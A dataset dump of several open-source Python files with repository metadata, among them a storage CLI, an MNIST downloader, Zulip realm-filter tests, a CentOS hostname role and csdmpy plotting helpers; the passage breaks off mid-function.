hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
417k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 1
class | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c4456f331c5f34771a86f26632a47558e095202
| 3,198
|
py
|
Python
|
systran_storages/bin/storages_cli.py
|
nguyendc-systran/storages
|
d31a18953ce9ce3d9b791f94b02837bfa156cb1a
|
[
"MIT"
] | null | null | null |
systran_storages/bin/storages_cli.py
|
nguyendc-systran/storages
|
d31a18953ce9ce3d9b791f94b02837bfa156cb1a
|
[
"MIT"
] | 1
|
2019-12-11T15:44:34.000Z
|
2019-12-11T15:44:34.000Z
|
systran_storages/bin/storages_cli.py
|
nguyenhn-systran/storages
|
d0f2a3b2b217313cca0980a43865811135e3f6a3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
from systran_storages import StorageClient
import argparse
import json
import six
import os
import logging
from datetime import datetime
def resolvedpath(path):
fields = path.split(':')
if not len(fields) == 2 or not fields[1].startswith('/'):
raise argparse.ArgumentError("incorrect storage path: %s" % path)
return path
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--config', default=None, required=True,
help='Storages configuration file.')
parser.add_argument('--info', '-v', action='store_true', help='info mode')
parser.add_argument('--verbose', '-vv', action='store_true', help='verbose mode')
subparsers = parser.add_subparsers(help='command help', dest='cmd')
subparsers.required = True
parser_list = subparsers.add_parser('list', help='list file on a storage')
parser_list.add_argument('--recursive', '-r', action='store_true', help='recursive listing')
parser_list.add_argument('storage', type=resolvedpath, help='path to list')
parser_get = subparsers.add_parser('get', help='download a file or directory')
parser_get.add_argument('storage', type=resolvedpath,
help='path to file or directory to download, directory must ends with /')
parser_get.add_argument('local', type=str, help='local path')
parser_get = subparsers.add_parser('push', help='upload a file or directory')
parser_get.add_argument('local', type=str, help='local path to file or directory to upload')
parser_get.add_argument('storage', type=resolvedpath,
help='remote path')
parser_stat = subparsers.add_parser('stat', help='returns stat on a remote file/directory')
parser_stat.add_argument('storage', type=resolvedpath, help='remote path')
args = parser.parse_args()
if args.info:
logging.basicConfig(level=logging.INFO)
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
with open(args.config) as jsonf:
config = json.load(jsonf)
# support configuration from automatic tests
if 'storages' in config:
config = config['storages']
client = StorageClient(config=config)
if args.cmd == "list":
listdir = client.listdir(args.storage, args.recursive)
for k in sorted(listdir.keys()):
if listdir[k].get("is_dir"):
print("dir", k)
else:
date = datetime.fromtimestamp(listdir[k]["last_modified"])
print(" ", "%10d" % listdir[k]["size"], date.strftime("%Y-%m-%dT%H:%M:%S"), k)
elif args.cmd == "get":
directory = args.storage.endswith('/')
if directory:
if os.path.isfile(args.local):
raise ValueError("%s should be a directory", args.local)
client.get_directory(args.storage, args.local)
else:
client.get_file(args.storage, args.local)
elif args.cmd == "push":
client.push(args.local, args.storage)
elif args.cmd == "stat":
print(client.stat(args.storage))
if __name__ == "__main__":
main()
| 38.071429
| 101
| 0.642276
|
from systran_storages import StorageClient
import argparse
import json
import six
import os
import logging
from datetime import datetime
def resolvedpath(path):
fields = path.split(':')
if not len(fields) == 2 or not fields[1].startswith('/'):
raise argparse.ArgumentError("incorrect storage path: %s" % path)
return path
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--config', default=None, required=True,
help='Storages configuration file.')
parser.add_argument('--info', '-v', action='store_true', help='info mode')
parser.add_argument('--verbose', '-vv', action='store_true', help='verbose mode')
subparsers = parser.add_subparsers(help='command help', dest='cmd')
subparsers.required = True
parser_list = subparsers.add_parser('list', help='list file on a storage')
parser_list.add_argument('--recursive', '-r', action='store_true', help='recursive listing')
parser_list.add_argument('storage', type=resolvedpath, help='path to list')
parser_get = subparsers.add_parser('get', help='download a file or directory')
parser_get.add_argument('storage', type=resolvedpath,
help='path to file or directory to download, directory must ends with /')
parser_get.add_argument('local', type=str, help='local path')
parser_get = subparsers.add_parser('push', help='upload a file or directory')
parser_get.add_argument('local', type=str, help='local path to file or directory to upload')
parser_get.add_argument('storage', type=resolvedpath,
help='remote path')
parser_stat = subparsers.add_parser('stat', help='returns stat on a remote file/directory')
parser_stat.add_argument('storage', type=resolvedpath, help='remote path')
args = parser.parse_args()
if args.info:
logging.basicConfig(level=logging.INFO)
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
with open(args.config) as jsonf:
config = json.load(jsonf)
if 'storages' in config:
config = config['storages']
client = StorageClient(config=config)
if args.cmd == "list":
listdir = client.listdir(args.storage, args.recursive)
for k in sorted(listdir.keys()):
if listdir[k].get("is_dir"):
print("dir", k)
else:
date = datetime.fromtimestamp(listdir[k]["last_modified"])
print(" ", "%10d" % listdir[k]["size"], date.strftime("%Y-%m-%dT%H:%M:%S"), k)
elif args.cmd == "get":
directory = args.storage.endswith('/')
if directory:
if os.path.isfile(args.local):
raise ValueError("%s should be a directory", args.local)
client.get_directory(args.storage, args.local)
else:
client.get_file(args.storage, args.local)
elif args.cmd == "push":
client.push(args.local, args.storage)
elif args.cmd == "stat":
print(client.stat(args.storage))
if __name__ == "__main__":
main()
| true
| true
|
1c44575a4ea6fbb81f6c44d4ca1a80d7726a22b8
| 3,002
|
py
|
Python
|
research/rebar/download_data.py
|
873040/Abhishek
|
2ddd716e66bc5cc6e6f0787508dd07da0e02e75a
|
[
"Apache-2.0"
] | 82,518
|
2016-02-05T12:07:23.000Z
|
2022-03-31T23:09:47.000Z
|
research/rebar/download_data.py
|
873040/Abhishek
|
2ddd716e66bc5cc6e6f0787508dd07da0e02e75a
|
[
"Apache-2.0"
] | 9,021
|
2016-03-08T01:02:05.000Z
|
2022-03-31T08:06:35.000Z
|
research/rebar/download_data.py
|
873040/Abhishek
|
2ddd716e66bc5cc6e6f0787508dd07da0e02e75a
|
[
"Apache-2.0"
] | 54,341
|
2016-02-06T17:19:55.000Z
|
2022-03-31T10:27:44.000Z
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Download MNIST, Omniglot datasets for Rebar."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import urllib
import gzip
import os
import config
import struct
import numpy as np
import cPickle as pickle
import datasets
MNIST_URL = 'see README'
MNIST_BINARIZED_URL = 'see README'
OMNIGLOT_URL = 'see README'
MNIST_FLOAT_TRAIN = 'train-images-idx3-ubyte'
def load_mnist_float(local_filename):
with open(local_filename, 'rb') as f:
f.seek(4)
nimages, rows, cols = struct.unpack('>iii', f.read(12))
dim = rows*cols
images = np.fromfile(f, dtype=np.dtype(np.ubyte))
images = (images/255.0).astype('float32').reshape((nimages, dim))
return images
if __name__ == '__main__':
if not os.path.exists(config.DATA_DIR):
os.makedirs(config.DATA_DIR)
# Get MNIST and convert to npy file
local_filename = os.path.join(config.DATA_DIR, MNIST_FLOAT_TRAIN)
if not os.path.exists(local_filename):
urllib.urlretrieve("%s/%s.gz" % (MNIST_URL, MNIST_FLOAT_TRAIN), local_filename+'.gz')
with gzip.open(local_filename+'.gz', 'rb') as f:
file_content = f.read()
with open(local_filename, 'wb') as f:
f.write(file_content)
os.remove(local_filename+'.gz')
mnist_float_train = load_mnist_float(local_filename)[:-10000]
# save in a nice format
np.save(os.path.join(config.DATA_DIR, config.MNIST_FLOAT), mnist_float_train)
# Get binarized MNIST
splits = ['train', 'valid', 'test']
mnist_binarized = []
for split in splits:
filename = 'binarized_mnist_%s.amat' % split
url = '%s/binarized_mnist_%s.amat' % (MNIST_BINARIZED_URL, split)
local_filename = os.path.join(config.DATA_DIR, filename)
if not os.path.exists(local_filename):
urllib.urlretrieve(url, local_filename)
with open(local_filename, 'rb') as f:
mnist_binarized.append((np.array([map(int, line.split()) for line in f.readlines()]).astype('float32'), None))
# save in a nice format
with open(os.path.join(config.DATA_DIR, config.MNIST_BINARIZED), 'w') as out:
pickle.dump(mnist_binarized, out)
# Get Omniglot
local_filename = os.path.join(config.DATA_DIR, config.OMNIGLOT)
if not os.path.exists(local_filename):
urllib.urlretrieve(OMNIGLOT_URL,
local_filename)
| 33.355556
| 116
| 0.70453
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import urllib
import gzip
import os
import config
import struct
import numpy as np
import cPickle as pickle
import datasets
MNIST_URL = 'see README'
MNIST_BINARIZED_URL = 'see README'
OMNIGLOT_URL = 'see README'
MNIST_FLOAT_TRAIN = 'train-images-idx3-ubyte'
def load_mnist_float(local_filename):
with open(local_filename, 'rb') as f:
f.seek(4)
nimages, rows, cols = struct.unpack('>iii', f.read(12))
dim = rows*cols
images = np.fromfile(f, dtype=np.dtype(np.ubyte))
images = (images/255.0).astype('float32').reshape((nimages, dim))
return images
if __name__ == '__main__':
if not os.path.exists(config.DATA_DIR):
os.makedirs(config.DATA_DIR)
local_filename = os.path.join(config.DATA_DIR, MNIST_FLOAT_TRAIN)
if not os.path.exists(local_filename):
urllib.urlretrieve("%s/%s.gz" % (MNIST_URL, MNIST_FLOAT_TRAIN), local_filename+'.gz')
with gzip.open(local_filename+'.gz', 'rb') as f:
file_content = f.read()
with open(local_filename, 'wb') as f:
f.write(file_content)
os.remove(local_filename+'.gz')
mnist_float_train = load_mnist_float(local_filename)[:-10000]
np.save(os.path.join(config.DATA_DIR, config.MNIST_FLOAT), mnist_float_train)
splits = ['train', 'valid', 'test']
mnist_binarized = []
for split in splits:
filename = 'binarized_mnist_%s.amat' % split
url = '%s/binarized_mnist_%s.amat' % (MNIST_BINARIZED_URL, split)
local_filename = os.path.join(config.DATA_DIR, filename)
if not os.path.exists(local_filename):
urllib.urlretrieve(url, local_filename)
with open(local_filename, 'rb') as f:
mnist_binarized.append((np.array([map(int, line.split()) for line in f.readlines()]).astype('float32'), None))
with open(os.path.join(config.DATA_DIR, config.MNIST_BINARIZED), 'w') as out:
pickle.dump(mnist_binarized, out)
local_filename = os.path.join(config.DATA_DIR, config.OMNIGLOT)
if not os.path.exists(local_filename):
urllib.urlretrieve(OMNIGLOT_URL,
local_filename)
| true
| true
|
1c44589d3c730e035ab6ff91365665923d59240b
| 241
|
py
|
Python
|
gc.py
|
rundekugel/micropythonemu
|
d135f7389f1f13fe33dda58778958ea74680fdbc
|
[
"MIT"
] | null | null | null |
gc.py
|
rundekugel/micropythonemu
|
d135f7389f1f13fe33dda58778958ea74680fdbc
|
[
"MIT"
] | null | null | null |
gc.py
|
rundekugel/micropythonemu
|
d135f7389f1f13fe33dda58778958ea74680fdbc
|
[
"MIT"
] | null | null | null |
# dummy lib
"""
dummy library gc to emulate esp8266 micropython on a PC with python3
uncomplete
2022 by lifesim.de
"""
from gc import *
def mem_alloc():
return 1000
def mem_free():
return -1
def threshold(a):
return -1
#eof
| 12.05
| 68
| 0.684647
|
from gc import *
def mem_alloc():
return 1000
def mem_free():
return -1
def threshold(a):
return -1
| true
| true
|
1c4459fbff634a63bf3eb4a631d67077bb257f72
| 5,415
|
py
|
Python
|
zerver/tests/test_realm_filters.py
|
kenclary/zulip
|
0267ba54b286a783dbde9a31d8ee2a0971671f73
|
[
"Apache-2.0"
] | 2
|
2021-09-01T17:44:28.000Z
|
2021-09-01T18:09:51.000Z
|
zerver/tests/test_realm_filters.py
|
kenclary/zulip
|
0267ba54b286a783dbde9a31d8ee2a0971671f73
|
[
"Apache-2.0"
] | 1
|
2021-03-24T12:50:52.000Z
|
2021-03-24T13:11:42.000Z
|
zerver/tests/test_realm_filters.py
|
kenclary/zulip
|
0267ba54b286a783dbde9a31d8ee2a0971671f73
|
[
"Apache-2.0"
] | null | null | null |
import re
from zerver.lib.actions import do_add_realm_filter
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import RealmFilter, get_realm
class RealmFilterTest(ZulipTestCase):
def test_list(self) -> None:
self.login("iago")
realm = get_realm("zulip")
do_add_realm_filter(realm, "#(?P<id>[123])", "https://realm.com/my_realm_filter/%(id)s")
result = self.client_get("/json/realm/filters")
self.assert_json_success(result)
self.assertEqual(200, result.status_code)
self.assertEqual(len(result.json()["filters"]), 1)
def test_create(self) -> None:
self.login("iago")
data = {"pattern": "", "url_format_string": "https://realm.com/my_realm_filter/%(id)s"}
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_error(result, "This field cannot be blank.")
data["pattern"] = "$a"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_error(
result, "Invalid filter pattern. Valid characters are [ a-zA-Z_#=/:+!-]."
)
data["pattern"] = r"ZUL-(?P<id>\d++)"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_error(
result, "Invalid filter pattern. Valid characters are [ a-zA-Z_#=/:+!-]."
)
data["pattern"] = r"ZUL-(?P<id>\d+)"
data["url_format_string"] = "$fgfg"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_error(result, "Enter a valid URL.")
data["pattern"] = r"ZUL-(?P<id>\d+)"
data["url_format_string"] = "https://realm.com/my_realm_filter/"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_error(result, "Invalid URL format string.")
data["url_format_string"] = "https://realm.com/my_realm_filter/#hashtag/%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "ZUL-15"))
data["pattern"] = r"ZUL2-(?P<id>\d+)"
data["url_format_string"] = "https://realm.com/my_realm_filter/?value=%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "ZUL2-15"))
data["pattern"] = r"_code=(?P<id>[0-9a-zA-Z]+)"
data["url_format_string"] = "https://example.com/product/%(id)s/details"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "_code=123abcdZ"))
data["pattern"] = r"PR (?P<id>[0-9]+)"
data[
"url_format_string"
] = "https://example.com/~user/web#view_type=type&model=model&action=12345&id=%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "PR 123"))
data["pattern"] = r"lp/(?P<id>[0-9]+)"
data["url_format_string"] = "https://realm.com/my_realm_filter/?value=%(id)s&sort=reverse"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "lp/123"))
data["pattern"] = r"lp:(?P<id>[0-9]+)"
data["url_format_string"] = "https://realm.com/my_realm_filter/?sort=reverse&value=%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "lp:123"))
data["pattern"] = r"!(?P<id>[0-9]+)"
data[
"url_format_string"
] = "https://realm.com/index.pl?Action=AgentTicketZoom;TicketNumber=%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "!123"))
data["pattern"] = r"(?P<org>[a-zA-Z0-9_-]+)/(?P<repo>[a-zA-Z0-9_-]+)#(?P<id>[0-9]+)"
data["url_format_string"] = "https://github.com/%(org)s/%(repo)s/issue/%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "zulip/zulip#123"))
def test_not_realm_admin(self) -> None:
self.login("hamlet")
result = self.client_post("/json/realm/filters")
self.assert_json_error(result, "Must be an organization administrator")
result = self.client_delete("/json/realm/filters/15")
self.assert_json_error(result, "Must be an organization administrator")
def test_delete(self) -> None:
self.login("iago")
realm = get_realm("zulip")
filter_id = do_add_realm_filter(
realm, "#(?P<id>[123])", "https://realm.com/my_realm_filter/%(id)s"
)
filters_count = RealmFilter.objects.count()
result = self.client_delete(f"/json/realm/filters/{filter_id + 1}")
self.assert_json_error(result, "Filter not found")
result = self.client_delete(f"/json/realm/filters/{filter_id}")
self.assert_json_success(result)
self.assertEqual(RealmFilter.objects.count(), filters_count - 1)
| 46.282051
| 98
| 0.628994
|
import re
from zerver.lib.actions import do_add_realm_filter
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import RealmFilter, get_realm
class RealmFilterTest(ZulipTestCase):
def test_list(self) -> None:
self.login("iago")
realm = get_realm("zulip")
do_add_realm_filter(realm, "#(?P<id>[123])", "https://realm.com/my_realm_filter/%(id)s")
result = self.client_get("/json/realm/filters")
self.assert_json_success(result)
self.assertEqual(200, result.status_code)
self.assertEqual(len(result.json()["filters"]), 1)
def test_create(self) -> None:
self.login("iago")
data = {"pattern": "", "url_format_string": "https://realm.com/my_realm_filter/%(id)s"}
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_error(result, "This field cannot be blank.")
data["pattern"] = "$a"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_error(
result, "Invalid filter pattern. Valid characters are [ a-zA-Z_#=/:+!-]."
)
data["pattern"] = r"ZUL-(?P<id>\d++)"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_error(
result, "Invalid filter pattern. Valid characters are [ a-zA-Z_#=/:+!-]."
)
data["pattern"] = r"ZUL-(?P<id>\d+)"
data["url_format_string"] = "$fgfg"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_error(result, "Enter a valid URL.")
data["pattern"] = r"ZUL-(?P<id>\d+)"
data["url_format_string"] = "https://realm.com/my_realm_filter/"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_error(result, "Invalid URL format string.")
data["url_format_string"] = "https://realm.com/my_realm_filter/#hashtag/%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "ZUL-15"))
data["pattern"] = r"ZUL2-(?P<id>\d+)"
data["url_format_string"] = "https://realm.com/my_realm_filter/?value=%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "ZUL2-15"))
data["pattern"] = r"_code=(?P<id>[0-9a-zA-Z]+)"
data["url_format_string"] = "https://example.com/product/%(id)s/details"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "_code=123abcdZ"))
data["pattern"] = r"PR (?P<id>[0-9]+)"
data[
"url_format_string"
] = "https://example.com/~user/web#view_type=type&model=model&action=12345&id=%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "PR 123"))
data["pattern"] = r"lp/(?P<id>[0-9]+)"
data["url_format_string"] = "https://realm.com/my_realm_filter/?value=%(id)s&sort=reverse"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "lp/123"))
data["pattern"] = r"lp:(?P<id>[0-9]+)"
data["url_format_string"] = "https://realm.com/my_realm_filter/?sort=reverse&value=%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "lp:123"))
data["pattern"] = r"!(?P<id>[0-9]+)"
data[
"url_format_string"
] = "https://realm.com/index.pl?Action=AgentTicketZoom;TicketNumber=%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "!123"))
data["pattern"] = r"(?P<org>[a-zA-Z0-9_-]+)/(?P<repo>[a-zA-Z0-9_-]+)#(?P<id>[0-9]+)"
data["url_format_string"] = "https://github.com/%(org)s/%(repo)s/issue/%(id)s"
result = self.client_post("/json/realm/filters", info=data)
self.assert_json_success(result)
self.assertIsNotNone(re.match(data["pattern"], "zulip/zulip#123"))
def test_not_realm_admin(self) -> None:
self.login("hamlet")
result = self.client_post("/json/realm/filters")
self.assert_json_error(result, "Must be an organization administrator")
result = self.client_delete("/json/realm/filters/15")
self.assert_json_error(result, "Must be an organization administrator")
def test_delete(self) -> None:
self.login("iago")
realm = get_realm("zulip")
filter_id = do_add_realm_filter(
realm, "#(?P<id>[123])", "https://realm.com/my_realm_filter/%(id)s"
)
filters_count = RealmFilter.objects.count()
result = self.client_delete(f"/json/realm/filters/{filter_id + 1}")
self.assert_json_error(result, "Filter not found")
result = self.client_delete(f"/json/realm/filters/{filter_id}")
self.assert_json_success(result)
self.assertEqual(RealmFilter.objects.count(), filters_count - 1)
| true
| true
|
1c445a8d09e9a4ab77e1462718f5caec6da3dc69
| 1,404
|
py
|
Python
|
provy/more/centos/utils/hostname.py
|
timgates42/provy
|
ca3d5e96a2210daf3c1fd4b96e047efff152db14
|
[
"MIT"
] | 15
|
2015-01-28T15:49:28.000Z
|
2021-09-02T18:49:46.000Z
|
provy/more/centos/utils/hostname.py
|
timgates42/provy
|
ca3d5e96a2210daf3c1fd4b96e047efff152db14
|
[
"MIT"
] | null | null | null |
provy/more/centos/utils/hostname.py
|
timgates42/provy
|
ca3d5e96a2210daf3c1fd4b96e047efff152db14
|
[
"MIT"
] | 3
|
2016-12-05T07:08:11.000Z
|
2021-12-26T04:31:05.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Roles in this namespace are meant to provide hostname utilities methods within CentOS distributions.
'''
from fabric.contrib.files import sed
from fabric.api import settings, hide
from provy.core import Role
class HostNameRole(Role):
def ensure_hostname(self, hostname):
'''
Ensure a fixed hostname is configured in the server.
:param hostname: Hostname to be created.
:type hostname: :class:`str`
Example:
::
class MySampleRole(Role):
def provision(self):
with self.using(HostNameRole) as role:
role.ensure_hostname('rabbit')
'''
if hostname == self.execute('hostname'):
return False
path = '/etc/sysconfig/network'
file = self.read_remote_file(path)
hostname_line = 'HOSTNAME={0}'.format(hostname)
self.log('Setting up hostname')
if 'HOSTNAME' not in file:
self.ensure_line(hostname_line, stdout=False, sudo=True)
else:
with settings(hide('warnings', 'running', 'stdout')):
sed(path, 'HOSTNAME=.*', hostname_line, use_sudo=True)
self.execute(
'hostname "{0}"'.format(hostname), stdout=False, sudo=True,
)
self.log('Hostname %s added' % hostname)
return True
| 27
| 100
| 0.590456
|
from fabric.contrib.files import sed
from fabric.api import settings, hide
from provy.core import Role
class HostNameRole(Role):
def ensure_hostname(self, hostname):
if hostname == self.execute('hostname'):
return False
path = '/etc/sysconfig/network'
file = self.read_remote_file(path)
hostname_line = 'HOSTNAME={0}'.format(hostname)
self.log('Setting up hostname')
if 'HOSTNAME' not in file:
self.ensure_line(hostname_line, stdout=False, sudo=True)
else:
with settings(hide('warnings', 'running', 'stdout')):
sed(path, 'HOSTNAME=.*', hostname_line, use_sudo=True)
self.execute(
'hostname "{0}"'.format(hostname), stdout=False, sudo=True,
)
self.log('Hostname %s added' % hostname)
return True
| true
| true
|
1c445ac0474100a6d6ada83425a4ce570d51ea83
| 17,999
|
py
|
Python
|
csdmpy/helper_functions.py
|
DeepanshS/csdmpy
|
ae8d20dd09f217bb462af67a3145bb6fcb025def
|
[
"BSD-3-Clause"
] | 7
|
2020-01-04T20:46:08.000Z
|
2021-05-26T21:09:25.000Z
|
csdmpy/helper_functions.py
|
deepanshs/csdmpy
|
bd4e138b10694491113b10177a89305697f1752c
|
[
"BSD-3-Clause"
] | 16
|
2021-06-09T06:28:27.000Z
|
2022-03-01T18:12:33.000Z
|
csdmpy/helper_functions.py
|
deepanshs/csdmpy
|
bd4e138b10694491113b10177a89305697f1752c
|
[
"BSD-3-Clause"
] | 1
|
2020-01-03T17:04:16.000Z
|
2020-01-03T17:04:16.000Z
|
# -*- coding: utf-8 -*-
"""Helper functions."""
from copy import deepcopy
from warnings import warn
import matplotlib.projections as proj
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.image import NonUniformImage
__author__ = "Deepansh J. Srivastava"
__email__ = "srivastava.89@osu.edu"
scalar = ["scalar", "vector_1", "pixel_1", "matrix_1_1", "symmetric_matrix_1"]
def _get_label_from_dv(dv, i):
"""Return label along with the unit of the dependent variable
Args:
dv: DependentVariable object.
i: integer counter.
"""
name, unit = dv.name, dv.unit
name = name if name != "" else str(i)
label = f"{name} / ({unit})" if unit != "" else name
return label
class CSDMAxes(plt.Axes):
"""A custom CSDM data plot axes."""
name = "csdm"
def plot(self, csdm, *args, **kwargs):
"""Generate a figure axes using the `plot` method from the matplotlib library.
Apply to all 1D datasets with single-component dependent-variables. For
multiple dependent variables, the data from individual dependent-variables is
plotted on the same figure.
Args:
csdm: A CSDM object of a one-dimensional dataset.
kwargs: Additional keyword arguments for the matplotlib plot() method.
Example
-------
>>> ax = plt.subplot(projection='csdm') # doctest: +SKIP
>>> ax.plot(csdm_object) # doctest: +SKIP
>>> plt.show() # doctest: +SKIP
"""
if csdm.__class__.__name__ != "CSDM":
return super().plot(csdm, *args, **kwargs)
return self._call_1D(csdm, "plot", *args, **kwargs)
def scatter(self, csdm, *args, **kwargs):
"""Generate a figure axes using the `scatter` method from the matplotlib
library.
Apply to all 1D datasets with single-component dependent-variables. For
multiple dependent variables, the data from individual dependent-variables is
plotted on the same figure.
Args:
csdm: A CSDM object of a one-dimensional dataset.
kwargs: Additional keyword arguments for the matplotlib plot() method.
Example
-------
>>> ax = plt.subplot(projection='csdm') # doctest: +SKIP
>>> ax.scatter(csdm_object) # doctest: +SKIP
>>> plt.show() # doctest: +SKIP
"""
if csdm.__class__.__name__ != "CSDM":
return super().scatter(csdm, *args, **kwargs)
return self._call_1D(csdm, "scatter", *args, **kwargs)
def imshow(self, csdm, origin="lower", *args, **kwargs):
"""Generate a figure axes using the `imshow` method from the matplotlib library.
Apply to all 2D datasets with either single-component (scalar),
three-components (pixel_3), or four-components (pixel_4) dependent-variables.
For single-component (scalar) dependent-variable, a colormap image is produced.
For three-components (pixel_3) dependent-variable, an RGB image is produced.
For four-components (pixel_4) dependent-variable, an RGBA image is produced.
For multiple dependent variables, the data from individual dependent-variables
is plotted on the same figure.
Args:
csdm: A CSDM object of a two-dimensional dataset with scalar, pixel_3, or
pixel_4 quantity_type dependent variable.
origin: The matplotlib `origin` argument. In matplotlib, the default is
'upper'. In csdmpy, however, the default to 'lower'.
kwargs: Additional keyword arguments for the matplotlib imshow() method.
Example
-------
>>> ax = plt.subplot(projection='csdm') # doctest: +SKIP
>>> ax.imshow(csdm_object) # doctest: +SKIP
>>> plt.show() # doctest: +SKIP
"""
if csdm.__class__.__name__ != "CSDM":
return super().imshow(csdm, *args, **kwargs)
x = csdm.dimensions
if x[0].type == "linear" and x[1].type == "linear":
return self._call_uniform_2D_image(csdm, origin=origin, *args, **kwargs)
def contour(self, csdm, *args, **kwargs):
"""Generate a figure axes using the `contour` method from the matplotlib
library.
Apply to all 2D datasets with a single-component (scalar) dependent-variables.
For multiple dependent variables, the data from individual dependent-variables
is plotted on the same figure.
Args:
csdm: A CSDM object of a two-dimensional dataset with scalar dependent
variable.
kwargs: Additional keyword arguments for the matplotlib contour() method.
Example
-------
>>> ax = plt.subplot(projection='csdm') # doctest: +SKIP
>>> ax.contour(csdm_object) # doctest: +SKIP
>>> plt.show() # doctest: +SKIP
"""
if csdm.__class__.__name__ != "CSDM":
return super().contour(csdm, *args, **kwargs)
x = csdm.dimensions
if x[0].type == "linear" and x[1].type == "linear":
return self._call_uniform_2D_contour(csdm, "contour", *args, **kwargs)
def contourf(self, csdm, *args, **kwargs):
"""Generate a figure axes using the `contourf` method from the matplotlib
library.
Apply to all 2D datasets with a single-component (scalar) dependent-variables.
For multiple dependent variables, the data from individual dependent-variables
is plotted on the same figure.
Args:
csdm: A CSDM object of a two-dimensional dataset with scalar dependent
variable.
kwargs: Additional keyword arguments for the matplotlib contourf() method.
Example
-------
>>> ax = plt.subplot(projection='csdm') # doctest: +SKIP
>>> ax.contourf(csdm_object) # doctest: +SKIP
>>> plt.show() # doctest: +SKIP
"""
if csdm.__class__.__name__ != "CSDM":
return super().contour(csdm, *args, **kwargs)
x = csdm.dimensions
if x[0].type == "linear" and x[1].type == "linear":
return self._call_uniform_2D_contour(csdm, "contourf", *args, **kwargs)
def _call_1D(self, csdm, fn, *args, **kwargs):
_check_1D_dataset(csdm)
x = csdm.dimensions
z = csdm.split()
one = True if len(z) == 1 else False
legend = False
for i, item in enumerate(z):
x_, y_ = item.to_list()
# dv will always be at index 0 because we called the object.split() before.
dv = item.dependent_variables[0]
